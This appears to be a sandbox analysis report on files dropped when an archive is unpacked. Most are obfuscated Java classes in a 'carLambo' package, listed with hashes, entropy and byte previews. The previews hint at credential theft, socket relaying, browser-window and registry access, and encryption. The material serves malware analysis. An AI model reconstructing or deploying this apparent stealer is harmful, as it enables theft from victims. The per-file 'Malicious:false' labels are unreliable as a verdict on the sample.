                        Preview:.......4.y........................................................................... ..!.."..$..+..,.....@..X..Y..\..^..f..h..i..j..k..s..t..v..w..x...........%..&..'..(..)..A..B..C..D..E..F..G..H..I..J..K..L..M..N..O..P..Q..R..S..T..U..V..W..3....3....3....3....4....4....7....K....1....2....3....3....3....3....3....3....5....6....6....7....7....7....7....7....7....7....8....9....:....;....;....;....<....=....=....=....=....>....?....@....A....B....C....C....C....D....D....E....E....E....E....E....E....E....E....E....E....E....E....F....F....F....F....F....G....H....H....J....J....L....L......................................................#....#....*....-........./....0....1....2....3....4....4....4....4....4....4....4....4....5....6....7....8....9....:....;....<....=....>....?....Z....[....]...._...._...._....`....a....b....b....c....c....d....e....g....l....m....m....n....o....p....q....r....u....u.................... /v "..."..." ..." /f...()I...()Ljava/io/InputStream;...()Ljava/i
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):121
                        Entropy (8bit):5.165193171690061
                        Encrypted:false
                        SSDEEP:3:DbllEFlY8NV3phHXy1L82EwYp3gQl9xUDJC1qQCK8P5GxgGn:8rZho6QQnxaJ2qRP5VG
                        MD5:4CF8C304A115C5507A9B0B3B4E92523D
                        SHA1:E6E76863825C3A0ACEA1F2492D15F4AF052C2A06
                        SHA-256:088813568A00014FD0A9651842BD5629E0B77BC6FAFF06E2D6E2317B9A605C04
                        SHA-512:4606F28D1999C55B4FC782EAF614F0991A9C5B70228CE5A93E65BDB14B6C9EC538AFAB3C0940F3D738F1E72F2890F1125B14C07C4BF77060FDC3A9ED0A41A837
                        Malicious:false
                        Preview:.......4...........()V...carLambo/iWGSWxRnUlPNEVGNllqlF...gQEuyVcYntwPXTysEtfquh...java/lang/Object......................
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):8141
                        Entropy (8bit):6.140925625237153
                        Encrypted:false
                        SSDEEP:96:Hh0phe90x1WejLUAZNQ5GR9qmTkk2lZu5N0sd+dE8ez845U15fYKgy4a8uFOHRpS:Hh0b3XTDa2N0Ui/ezWfiba1UxpS
                        MD5:55239751E43F849EA8BF05FFC03B963F
                        SHA1:E3058AE0E63561A03149002602AE969434A087CE
                        SHA-256:E78AA7F38A8720EB99D8A529A0C63809D9F5FBBE4323ADD402D21768D8CFC7C4
                        SHA-512:223C9D02DA40E88E6C0BDE1DEA57605D6119FC66334BF76CF8FF51E55C32C1F79A9E6ADB373F01C06B7172043B52284C5DC9E70800747360D0C538ED089206F1
                        Malicious:false
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):284
                        Entropy (8bit):5.226148508530949
                        Encrypted:false
                        SSDEEP:6:kkPKd0hSW4y1Hq7vsxY7vmJ8LnxaJ2qRPt+NulI0OloF/llplll:lCNy1HOvQY7+JUnxaJtRlnlINlo9/L/
                        MD5:E4998F00064F1CAA3425FE0CED3EDF73
                        SHA1:1DDA65487E72427F3D7FD930E097C889250A21BE
                        SHA-256:4D4BE6ABED1F8B032BE853BB379475CED451F8A1C2612874D23B6865CE8FCFC6
                        SHA-512:760F667D733EBD2F4C5345D4879C8160C570E6D86242BD33868853F46DE5F70F1D01F4428BDD7C403A2288926E20D4E435C5715249A259446F77C69A2803AF2D
                        Malicious:false
                        Preview:.......4.....................................()V...<init>...Code.. carLambo/ISyzDWggemUZimyTYMwRRfQ.."carLambo/lUtzYRoVxoBKRpnyWYynzJxpJ...gQEuyVcYntwPXTysEtfquh...java/lang/Object...java/lang/Runnable...run.0..................................*........................................
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):6205
                        Entropy (8bit):6.0261454669599015
                        Encrypted:false
                        SSDEEP:48:Ve9KPRr6LURBipyCI4dhtkyEARQphs0U6Mvgr7qQlaZ7lxKqz5DV00sMlyZW/3u0:k9oRYI2DEAugmaZmwog+gXalxg3j8aV
                        MD5:688C0B9E0E86508E0E4D2419D7FB010E
                        SHA1:C6C9A27CCE94B2F11B5D92117175307BFD35FF68
                        SHA-256:F9D63AF93D7DAE4A2EDA2BD6FEBDCE384E8C0820B2D2EB9AC2A153F2B2324206
                        SHA-512:58E2A79939D7F7F61E54117A97B1F2E7F3395DEE63D7609398D9EBEA2410014DF5954C63640D0ED8BC2E0A96626B924D85E7784221056B26ECAA2B0B3C07902C
                        Malicious:false
                        Preview:.......4.Q.>....................3..4..5..6..7..8..9...................................... ..!.."..#..$..%..&..'..(..)..*..+..,..-...../..0..1..2...................?.ffffff.....................................%................|.................................................}.............................|...................~........................|.............................|.. ....!....".|..#....#....#....#....#....#....#....#....$.|..$....$....&....&....&....'....'....'....)....*....*....+....+....,....,....,....,....(....(............................................................................................................................................................................................................:....;....<....=....>....?....?....@....A....B....C....C....D....E....F....G....H....I....J....K....L....M....N....O....P....P..........()I...()Ljava/awt/Dimension;...()Ljava/awt/Graphics2D;...()Ljava/awt/Toolkit;.. ()Ljava/awt/image/BufferedImage;...()Ljava/io/
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):445
                        Entropy (8bit):5.546655524612381
                        Encrypted:false
                        SSDEEP:12:c/mqtMjQKjzy1nojG1nxaJtRVwOmqI+ykA:omRtPy1noCxQHPw/5kA
                        MD5:7C064E0604033C54B60BB36751A4F815
                        SHA1:441326BF5DE070A678526F1FA2CAC59EE727876F
                        SHA-256:9C4C46067FF01C19019981A8F2C268D46622B9FB3B934D2C06B14C36F629BAD8
                        SHA-512:636017163C0C7084759EBDDCF1D235283020954A66585595165640ABBE2E99676BF0FA4AF4608D8F279AE4396EBD05C95F17F2D7EA551F564E14EBE57FE41649
                        Malicious:false
                        Preview:.......4.........................................()V..$(LcarLambo/CHHXGzeSpzwiJOAtZoSZBJ;)V..%(LcarLambo/CHHXGzeSpzwiJOAtZoSZBJ;B)V...<init>...Code...I..!LcarLambo/CHHXGzeSpzwiJOAtZoSZBJ;...Ljava/io/InputStream;...carLambo/mHewsQjItURiLCXNkzji...gQEuyVcYntwPXTysEtfquh...java/lang/Object...nnHRYoAONroTDXAkGOnAtRE...qvNsplybcQmnatGjnQTThBZ.0........................................................*+...*..............................*+..........
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):651
                        Entropy (8bit):5.556061557366131
                        Encrypted:false
                        SSDEEP:12:QuktM6mMOagMBMcGsMkhy18rkMvnoznxaJVRF7MsqMXlomMDbFWxUDHlMBl:QTM6dMGy18r5wrQzz5wb4xuMT
                        MD5:3953348AC83DAEF9490DDA4344020076
                        SHA1:0E33CE888DA1231E8820F0042F98377F38998196
                        SHA-256:743B7A248C9572322742DB6CD99BA67066306B9A1A8CE4B423F51C0A6D577550
                        SHA-512:D0446B04BF35188CD4FFE7D66104AEC9B224F2DB1ACF3844CE31F28DE500C5C2A0E7CAE9487D3B70A2FC664D368B21B0CD7605541E2BF2FDBC204E822705190A
                        Malicious:false
                        Preview:.......4.+.. .."..%..&..'..(....................................................!....#....$....)....*.....()Ljava/lang/String;...()V...(Ljava/io/InputStream;)V..-(Ljava/lang/String;)Ljava/lang/StringBuilder;...([BII)I...([BII)V...<init>...Code...Ljava/io/InputStream;...StackMapTable...[B...append..!carLambo/nPpeMSRGcCgSgfpfzdBoEfHy...close...gQEuyVcYntwPXTysEtfquh...java/io/InputStream...java/lang/Object...java/lang/String...java/lang/StringBuilder...read...toString.1...........$............................*...*+...........$.........m.......@.....L...Y...M*...+.+....Y>....*.........,...Y+........W...,...........................................
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):395
                        Entropy (8bit):5.441731912204154
                        Encrypted:false
                        SSDEEP:6:Fb+s3jsURY94y1rRYLRYxpT/VVnxaJ2qRPt+NulkXi8BPmlknM50:FbxR1y1rRMROpVVnxaJtRlnlsLqkM50
                        MD5:FBD00923D65394922C4E189A4D23D6C6
                        SHA1:8D8FA2BBF47B24EFB55E504B8FE6E25ACE44EBDE
                        SHA-256:5AFDFF4A9129C84A7AA09616BCC0F8CF09D265A26833E4EA8C45FBCC27DD0640
                        SHA-512:3C2E9458ECA59358F99DD5776B109034DAAE4C20D8D0B7315ED76CFADD45806CA0FC1DA0E2A399CFA1CFE1DC8C0A874D0D9E3D8D55F21A9D184F409BD9C791EB
                        Malicious:false
                        Preview:.......4...............................................()V..&(LcarLambo/GeLuFwhdbiiEVoEeoUbtXxPX;)V...<init>...Code..#LcarLambo/GeLuFwhdbiiEVoEeoUbtXxPX;..!carLambo/GeLuFwhdbiiEVoEeoUbtXxPX..&carLambo/niHBeoQPoWsSpEBovnMizhbIfpQUU...gQEuyVcYntwPXTysEtfquh...java/lang/Object...java/lang/Runnable...run.0..........................................*+...*..............................*.............
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):4556
                        Entropy (8bit):6.057717063212165
                        Encrypted:false
                        SSDEEP:96:g4OokMEnjUySaTiOVB/MWmDjUf4SI6OKJ42sIGaQfT:d3kMEdVTiOV9Eiu2J3ET
                        MD5:B49D49728DBAE4901BB5B8BB81014C28
                        SHA1:31BF7D0A02708E557E01D429217D12CB7615C58F
                        SHA-256:BAB5692C03D65905D43785B4FABFDD39F46A93825C02914D8AB363BFC5D9CC89
                        SHA-512:F6FACB18F227B070478E1315474C0074AE5740D9CC1BC650126F12EE5683045CF60C896B4A24AA7EF449568DF097B9D1CCAC54CBC51252DDADA5CF62F5E5F9E5
                        Malicious:false
                        Preview:.......4...............................................................................................................}....i....j....k....}..................................~....}....z....{....|..............r....e....s..............d.........x.........b....f....h....p....u....y....b....e....l....m.............................w.........o....... .t.. .... .... ....!.c..".g..#......n....q.........n...................n....v..............................................................................................................................................................................................................................................................................................()I...()J...()Ljava/lang/String;...()Ljava/sql/Statement;...()V...()Z...()[B...(C)Ljava/lang/StringBuilder;...(I)Ljava/lang/String;..B(ILjava/security/Key;Ljava/security/spec/AlgorithmParameterSpec;)V...(I[B)V...(Ljava/io/File;)V...(Ljava/io/File;Ljava/io/File;)V..3(Ljava/lang/CharSequenc
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):4867
                        Entropy (8bit):5.845168958385616
                        Encrypted:false
                        SSDEEP:96:/tW6bbP9ZiVeROwAN5qk4zak0QxDg2YfbppMXTlZNwBZ:/oqrJRORqZDM2YDppYzNwBZ
                        MD5:A7610A543F361780AB282AE8DAFF38BF
                        SHA1:416D6F8BC9EF6926A3DC1F57938F45FE20DF4EEC
                        SHA-256:4F2FF7B535333C62AFFFB3D656ABD6225C247AFE01AFF6D7B786A73F965EF4A6
                        SHA-512:DB618E167CAF9D5075C3F42FCFED47F4F8560F483FAFE2512AD6BE780DD2E372250E1F2EB07E7D437B8F1DB36D1ACC652213FF58C258DFE61EDFD1AC51098F7B
                        Malicious:false
                        Preview:.......4.........X..Y..Z..[..\..w..x..z..{..|..}..~..........................................................G....?....H....I....K....M....N....>....R....O....P....=....@....E....F....J....L....S....T....U....V....=....?....B....C....W....A....D....Q..v.`..v.j..v.p..v.u....f....e....o....b....k....m....i...._...._....n....a....]....^....c....n....r....t....s....l....q....d....g...._...................Password: ..."...()I...()J...()Ljava/lang/String;...()V...()Z...()[B...()[Ljava/io/File;...(I)Ljava/lang/String;...(I)Ljava/lang/StringBuilder;...(I)Ljava/nio/ByteBuffer;...(II)Ljava/lang/String;..'(ILjava/lang/String;)Ljava/lang/String;..:(ILjava/lang/String;Ljava/lang/String;I)Ljava/lang/String;...(Ljava/io/File;)V...(Ljava/lang/CharSequence;)Z..D(Ljava/lang/CharSequence;Ljava/lang/CharSequence;)Ljava/lang/String;...(Ljava/lang/Object;)Z...(Ljava/lang/String;)I..-(Ljava/lang/String;)Ljava/lang/StringBuilder;...(Ljava/lang/String;)V..'(Ljava/lang/String;)[Ljava/lang/String;...(Ljava/lang/
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):1158
                        Entropy (8bit):5.896238701318844
                        Encrypted:false
                        SSDEEP:24:RK6ERAd4CvWL9aCvW63y1f9LCvWF1SLj4exACvWxCvWmQCz5UEN5Vxk9c/:KNCvg9aCvxyCvQ1Sj9xACvgCvWmQCz5Z
                        MD5:59FFCC9CD906BFBEBD1F0DCC5648E96F
                        SHA1:5E012AE14E926FC4FF9F31FAA8179CCAF14DC87D
                        SHA-256:7C0CE7FF9266E6039D13003C0E743D03716666D2F4B54346C8777C3BD00BC5C2
                        SHA-512:CB02B8C7A7F2E9635751C6A0002CC64529F50F1222C1984274E92B39A1D091F112844D6B7DDF59C63462F9220CD17056305139AB624160EC792B7F1098B6A7F7
                        Malicious:false
                        Preview:.......4.=...../..0..1..2..3..4..8..9....................................................%....5.#..6."..6.'..6.(..7....:.*..:.+..;.)..<.$...()V...()Z..;(LcarLambo/pOkXJMhVItPChYeMRCPBQRAUzLx;Ljava/lang/String;)V..@(Lcom/sun/jna/platform/win32/WinDef$HWND;Lcom/sun/jna/Pointer;)Z...(Lcom/sun/jna/platform/win32/WinDef$HWND;[BI)I...(Ljava/lang/CharSequence;)Z...([B)Ljava/lang/String;...<init>...Code...I...LcarLambo/HBrowserNativeApis;..&LcarLambo/pOkXJMhVItPChYeMRCPBQRAUzLx;..(Lcom/sun/jna/platform/win32/WinDef$HWND;...Ljava/lang/String;...StackMapTable...callback...carLambo/HBrowserNativeApis..!carLambo/oarPtnuBJYDryklAVpYvVplj..$carLambo/pOkXJMhVItPChYeMRCPBQRAUzLx...com/sun/jna/Native...com/sun/jna/Pointer..&com/sun/jna/platform/win32/WinDef$HWND...com/sun/jna/platform/win32/WinUser$WNDENUMPROC...contains...gQEuyVcYntwPXTysEtfquh...isEmpty...java/lang/Object...java/lang/String...nnHRYoAONroTDXAkGOnAtRE...qvNsplybcQmnatGjnQTThBZ...toString.0.............6.'.....:.+.....;.).......%. ...&.
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):14656
                        Entropy (8bit):6.307093846144187
                        Encrypted:false
                        SSDEEP:384:yaPdSwHTr5Dbw8+zNbNoBtVhtKexwzJ+zNbNoBMv:y2cwHTNDkrNbNoBT/LHNbNoBY
                        MD5:4C47D6B8B9B9251F57686B0288509A82
                        SHA1:207CCB258ED2ED73CA81A63E5FA9DC34CCD69D0A
                        SHA-256:52B7BE8E98604F03EFC820E7EC77FF16011568F986C45371022862AFF4CA0F46
                        SHA-512:03C0629A53D1FC464F7C899253156FDF4FF81F922199D8864CC3D30DBCCCDC365AE348B10D9084D260262F7F5F8EC570BE458BCAA357EA6297DACD06C307E021
                        Malicious:false
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):500
                        Entropy (8bit):5.517542984835602
                        Encrypted:false
                        SSDEEP:12:airyKhy1CFYJLhZQnxaJtRF+KBtYkloFdMglZjKLLjRL7:aiXhy1QYJLhcQHzTLTi17ELFL7
                        MD5:A75CA155222D6842941EA36F3D7204A3
                        SHA1:78700C9DCC3891739815FD1F8BB33D0C69A90158
                        SHA-256:262F9E27965D45FDD1EDA1FF53C104945C5600CEA4DD83C96D508E7FA74499FC
                        SHA-512:C0465FA5020B3FFBF924DBED1830B72646002D24CE7F660700D0D8DA0F20F5B9E6A88304B3B2D94E5D429C4DB692AAEB0073DD2AA4E84A5F1D11700656585AB4
                        Malicious:false
                        Preview:.......4.............................................................................()V...(Ljava/lang/Runnable;)V..%(Ljava/net/Socket;Ljava/net/Socket;)V...<init>...Code...Ljava/net/Socket;...carLambo/YlqtqHSDDFgBzCqfJBUfI...carLambo/pXEQYpIAvPbarbDZMRoR...gQEuyVcYntwPXTysEtfquh...java/lang/Object...java/lang/Thread...nnHRYoAONroTDXAkGOnAtRE...start.1................................................*.....................I.......=*+...*,......Y...Y*...*...............Y...Y*...*...................
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):1676
                        Entropy (8bit):5.735242258674326
                        Encrypted:false
                        SSDEEP:48:7fB1oTTfEJcRh6VHqdQE/z5ku9ehIBRJ8FhI0I9HOQC:7ff6jqhwehI/PC
                        MD5:8C607C3CAA15C88543DB425FE44BDE81
                        SHA1:FD6774C03ED934612D6EF3B1514D3C503249FF04
                        SHA-256:3DD16BEAC17A5E424C5B69044E411DC02EE8734A02F1115B67E6B455374E8742
                        SHA-512:926E76612FB06B31F558488B785682A3046EBBA1B095A63966FE52ABEB8B0DFD8DF81A8489384C9E251E6AD7C691B90DE15A5DD5FCAD1139A441D3464CDC1E68
                        Malicious:false
                        Preview:.......4.d..A..D..P..T..U..V..W..X..Y..Z..[....'....)....+....,..../....(...."....#....$....!....!....&....-....1....2....%....*....3....!....0.......C.6..C.9..C.:..C.;..C.>..C.@..G.J..K.I..N.M..O.=..R.M..S.H..\.4..].8..^.H..`.<..a.7..b.?..c.5...()I...()Ljava/lang/String;...()V...()[C...(I)I...(I)V.. (ILjava/security/SecureRandom;)V..((ILjava/util/Random;Ljava/lang/String;)V..&(Ljava/lang/Object;)Ljava/lang/Object;..-(Ljava/lang/String;)Ljava/lang/StringBuilder;...(Ljava/lang/String;)V..&(Ljava/util/Locale;)Ljava/lang/String;...([C)V...0123456789...<clinit>...<init>...ABCDEFGHIJKLMNOPQRSTUVWXYZ...Code...ConstantValue...GYDTPVEwzYqRTvxmvHtRLJG...Ljava/lang/String;...Ljava/util/Locale;...Ljava/util/Random;...ROOT...StackMapTable...[C...akllnBiTjwPmAwfMbajsTFm...append..'carLambo/pjLIIQVgvuPOInKOREwLQrvvgxeCAr...gQEuyVcYntwPXTysEtfquh...gcLmiwpDoXkEofFgIgnkAFbECjBM...ghKDbwZCNsgFCyEcTHODu.."java/lang/IllegalArgumentException...java/lang/Object...java/lang/String...java/lang/StringBuilder.
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):531
                        Entropy (8bit):5.475737054020017
                        Encrypted:false
                        SSDEEP:12:Ltl4BznMAZy1FPHTCZnxaJLCgmrhOzXbSUNhGKFSi7cdtUc7MmXS2/:LtGB/y19HTCNQTku2cRXUtUoMmXSm
                        MD5:B090088EAB134039A96C6073B52654B7
                        SHA1:028929F36DC8A71FFB2995ACF36004B09A6CBD42
                        SHA-256:D2BE43B8D7B7EF1884B6B2778CB0C8226B138EBFC0BBD9E4A966EE1170180793
                        SHA-512:C87D0B557A5A2BC5F087A562BE751C0DE4E311E0D8412C1194434B11E8569DABCA21F3C12A755977DB04A055A675A2C75DA0065678498769E4BDC279DD7E1919
                        Malicious:false
                        Preview:.......4.!........................................................................()Ljava/lang/Object;...()V...()[I...(Ljava/lang/String;I)V...<clinit>...<init>...Code...I...[I...carLambo/qQnenommQRmzAInlnTAeg...clone...gQEuyVcYntwPXTysEtfquh...ghKDbwZCNsgFCyEcTHODu...java/lang/Enum...nnHRYoAONroTDXAkGOnAtRE...qvNsplybcQmnatGjnQTThBZ...values$258dc6c5.0............................................. ......................................................*+......................1.......%...............Y....OY....OY....O..........
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):2302
                        Entropy (8bit):5.832304833865136
                        Encrypted:false
                        SSDEEP:48:EDNIWoHhxnOahCOC4pYBSuvQ2Wmz5DV3rilK49TlSpup0u5woeb5B+6X+0Fbnj:KI7HDjQSIpbinScmoe9cto
                        MD5:7B5452BF6258BE8D66C9A0DB5B55D64B
                        SHA1:2B4088F7104D1853777A266CE5CB2252537E4E0D
                        SHA-256:47D1007C91E0BE64C2B77ABDA069B3372CB23F04E16D9CAECD44B3BAB8E25AC3
                        SHA-512:B34174E2D0A4764DE7F4623F2A76022128CE51E435112C9E212AAAEBBD08113D769B6C5C3711BFADD19C0DE027A88F3F3D6A53E4AAB8D3336BCC3E5E7B00A2AB
                        Malicious:false
                        Preview:.......4.w..R..T..V..\..W..Y..Z..`..a..b..c..d..e..f..g..h..i..j..k..l....8.........5..../....3....:....1....4....;....1....3....?....9....-....-....1....2....>....0....=....1....7....6....<..P.C..P.F..P.H..P.I..P.K..X.J..[.C..].D..^.L.._.@..n.B..o.S..p.K..q.M..r.G..s.L..t.C..u.A..v.N...()Ljava/io/InputStream;...()Ljava/lang/String;...()Ljava/net/URLConnection;...()V...()Z..I(LcarLambo/qvNsplybcQmnatGjnQTThBZ;Ljava/lang/String;Ljava/lang/String;)V..8(LcarLambo/qvNsplybcQmnatGjnQTThBZ;[Ljava/lang/String;)V...(Ljava/io/File;)Z...(Ljava/io/InputStream;)V...(Ljava/lang/Runnable;)V..-(Ljava/lang/String;)Ljava/lang/StringBuilder;...(Ljava/lang/String;)V..'(Ljava/lang/String;Ljava/lang/String;)V...([BII)I...([BII)V...([Ljava/lang/String;)V...<init>...Code...EXCEPTION: ...Ljava/io/PrintStream;..NMozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0...StackMapTable...User-Agent...[B...append...carLambo/ghKDbwZCNsgFCyEcTHODu.. carLambo/qvNsplybcQmnatGjnQTThBZ...close...d
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):1695
                        Entropy (8bit):5.848532205389725
                        Encrypted:false
                        SSDEEP:48:nL+rsw6cgIMph9y87TIQIf6gjFfE9DfOK:nLubtgaoTIhrJfyDfh
                        MD5:EC45BD87F8DA13CD0D8329BDA04FA591
                        SHA1:71EE4CBFA4071A4EAA7A12568F476AB25AA00000
                        SHA-256:A791B9B5C5E0779C0999CCF89DD5BB7D37EC5975B8C98F875304D1C6A7288D8A
                        SHA-512:4D197D810834A94414CB0867367E901F17E79F80A98386BC0E3897570A041E5C6551B94C9594495D7725AAF4A1C831175C01DCE71A65A2833BDADBA9174DFB52
                        Malicious:false
                        Preview:.......4.g..6..;..?..@..c..f..R..S..T..X..Y..Z....*....2....#....$....%....&....'....(....+....,....-........./....1....3....4....0...."...."....)....5..=.8..A.I..C.I..D.I..L.I..M.O..P.E..Q.:..U.E..U.I..V.I..W.E..[.I..\.I..].9..].E..a.E..a.I..b.I..d.7......()Ljava/lang/String;...()V...(I)Ljava/lang/String;..-(Ljava/lang/String;)Ljava/lang/StringBuilder;...127.0.0.1...<clinit>...<init>...AimdQBqtwmRlTmfOwmvjwNywPJZsM...C:\Program Files...C:\Program Files (x86)...CHHXGzeSpzwiJOAtZoSZBJ...Code...GYDTPVEwzYqRTvxmvHtRLJG...GeLuFwhdbiiEVoEeoUbtXxPX...I..&LcarLambo/VRdaqkGKmButMUdsZLfSOLnpgVk;...Ljava/io/InputStream;...Ljava/io/OutputStream;...Ljava/lang/String;...Ljava/net/Socket;...Ljava/util/Random;...OeziLNfIzXyeUUtuiOSPKlGvibRk...QsNkSlGCqFomtjHlHdgKKJlOETn...TQaTMIBufeXwulTTDuvpxBTBfNW...Z...akllnBiTjwPmAwfMbajsTFm...append..&carLambo/iytiDwrcScnkWxsldKZwufPjSLiFk...carLambo/qQnenommQRmzAInlnTAeg...carLambo/rCYbIngZMxCXvVYABulZ...gQEuyVcYntwPXTysEtfquh...gcLmiwpDoXkEofFgIgnkAFbECjBM...g
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):395
                        Entropy (8bit):5.433105859277028
                        Encrypted:false
                        SSDEEP:12:Fbe/ey1+/t2nIiTb/eLnxaJtRl9/LqkM50:FbeGy1+WIiTbWTQHz9bM50
                        MD5:2472140BE900D15A86B7F0C55AB4CCC0
                        SHA1:9C164354ACB06CFECD1EE853D8500FFEBEB55AF9
                        SHA-256:ADA6D904B533CD7E26A7C912ADE7EC75B1226F63ED4D6E64D283F2025131C57F
                        SHA-512:4F599BA5119D7CB317F3F8075983212AA35CE7294B50300195A69D745635591B7A887DE1CCE9EA68DB46EF9B908D8513302907A849F669648066D923CB0D233A
                        Malicious:false
                        Preview:.......4...............................................()V..((LcarLambo/tXuEElkzfqlTWetjTVgwULpwLk;)V...<init>...Code..%LcarLambo/tXuEElkzfqlTWetjTVgwULpwLk;.. carLambo/rEgmEOZGPmyKjwgxifrjbDi..#carLambo/tXuEElkzfqlTWetjTVgwULpwLk...gQEuyVcYntwPXTysEtfquh...java/lang/Object...java/lang/Runnable...run.0..........................................*+...*..............................*.............
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):3791
                        Entropy (8bit):5.956108863850589
                        Encrypted:false
                        SSDEEP:96:IlWpVDXAhm6BZE2bXFB8K5qiIBqH6AmhmaW8A:IQz8P9QiIE6AmhmaW8A
                        MD5:62E9332668273D9C6C33E95D3CC130AA
                        SHA1:5987EE0A7045BF3257793D7374D42424ACF6E61D
                        SHA-256:27635BD38B6E8FDC68DFB38E2624FDFD25462D75CFC555683D2A793CA16416AB
                        SHA-512:FFF7D32801A1165E50D6BC525FDABD23AA303C4830D781DC00F0147C985C073EEB69FF11C6B3DD4FECD6CC9396F0F812C317594BD9F3AEB1A29ACAE2396E4744
                        Malicious:false
                        Preview:.......4.........]..^.._..s..t..u..v..w..x..y..z..{..}...............................................................................................#.I....O.. .P..!.X..".M..$.W..%.G..&.H..&.L..&.N..&.R..&.Y..&.[..'.G..'.K..'.\..(.G..).S..).V..*.J..*.T..*.Z..+.Q..+.U..,.T..|.e..|.q.........m....n....j....r....o....h....r....l....g....f....c....d....a....e....i....k....`....b....b................()I...()Ljava/lang/Object;...()Ljava/lang/String;...()Ljava/util/Iterator;...()Ljava/util/Set;...()V...()Z...()[B..&(ILjava/lang/String;I)Ljava/util/List;..O(Lcom/sun/jna/platform/win32/WinReg$HKEY;Ljava/lang/String;)Ljava/util/TreeMap;...(Ljava/lang/CharSequence;)Z..D(Ljava/lang/CharSequence;Ljava/lang/CharSequence;)Ljava/lang/String;..&(Ljava/lang/Object;)Ljava/lang/Object;...(Ljava/lang/Object;)Z..-(Ljava/lang/String;)Ljava/lang/StringBuilder;..9(Ljava/lang/String;[Ljava/lang/Object;)Ljava/lang/String;..$(Ljava/util/Set;Ljava/lang/String;)Z...([B)V...([B)[B...10.0...11.0...12.0...14.0...15.0.
                        Process:C:\Windows\System32\7za.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):220
                        Entropy (8bit):5.806563737900548
                        Encrypted:false
                        SSDEEP:3:WpBbvF5BaAcFiH/E/+TO+TA7BGOLt9Lf1tW81X/iQPO4va1TirP/sQ/I1XWdgoBS:cdvF5BLffbOv7XxLkiVvaZ45Q1hos
                        MD5:6DECD93E4BB003A96D152A867D904E97
                        SHA1:24E872B663DF301296C4CDFB8BF42A616C27F913
                        SHA-256:241AB6883F7CCE8A6B932F63239EB705F70EF00B6B833988FB13C2C6702D2B35
                        SHA-512:07C3E7C5825143995537B252CC4D7D3E172DD5BAA455BD5980952927B0BBE76D5D90A804F17BCF594105AFE0FA919C6EE891F4C98BA6559A7B50A1BA14FA591C
                        Malicious:false
                        Preview:AAAAEPlvVrpBpOKMW+3XNgMVLeyIEnyunpPiey4EwGjaLoZm6nZRKnB6kF1FzL+DfbFsc9UUwAfFmCiHte+LRxCksknS/dvYJegG0tOrynnCkYcBD6JlRx3Ba0PgEu9PwSl6G5prswhf5Yr8ZIDsJU5R3K1No0J2oIkH64zY0dj9BRVguJ3yx5ZTkfY4wd1kPZBAK7EvZadrRRLzf7JdIXm4AEU=
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):6242
                        Entropy (8bit):6.069519566743482
                        Encrypted:false
                        SSDEEP:192:/eWaw0AzJrMhTto9jSPEIb7qTaPEI57vVV:/aUJrMtodHVjQ7
                        MD5:D0EA461CD89FBC991117F598EA004A2F
                        SHA1:BF492721B48BDF6460B2771ED72A5509534BE1C2
                        SHA-256:8E8714BDADB543634771F2A6B65EA75F839C9A7AD2180C51C753E2F276DD046D
                        SHA-512:96CACA2E7FC709B27EAC71AB61BAA1A90DD1C181005FE308B7581584E954C6D5451BB157EA8873DA82F7C0C74C3414D42263B0C9F6F48FB18EE381D1A5AC1F83
                        Malicious:false
                        Preview:.......4.....................................................................................................................@.....r.................!.f...................a....q....a....`..............d....l....o....s....v....z....}....~....b....k.........b....k....p.........v....`....n....|.........`....i.........w....c.........h....j..............`.........`..".u.."....#.m..#.t..#.y..$.e....x....... .g.. .{........................................................................................................................................................................................................................................................()J...()Ljava/lang/Object;...()Ljava/lang/String;...()Ljava/util/Iterator;...()Ljava/util/List;...()V...()Z...()[B...()[Ljava/io/File;...(I)Ljava/nio/ByteBuffer;...(II)Ljava/lang/String;..B(ILjava/security/Key;Ljava/security/spec/AlgorithmParameterSpec;)V..((LcarLambo/tXuEElkzfqlTWetjTVgwULpwLk;)V...(Ljava/io/File;)V...(Ljava/lang/Object;
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):404
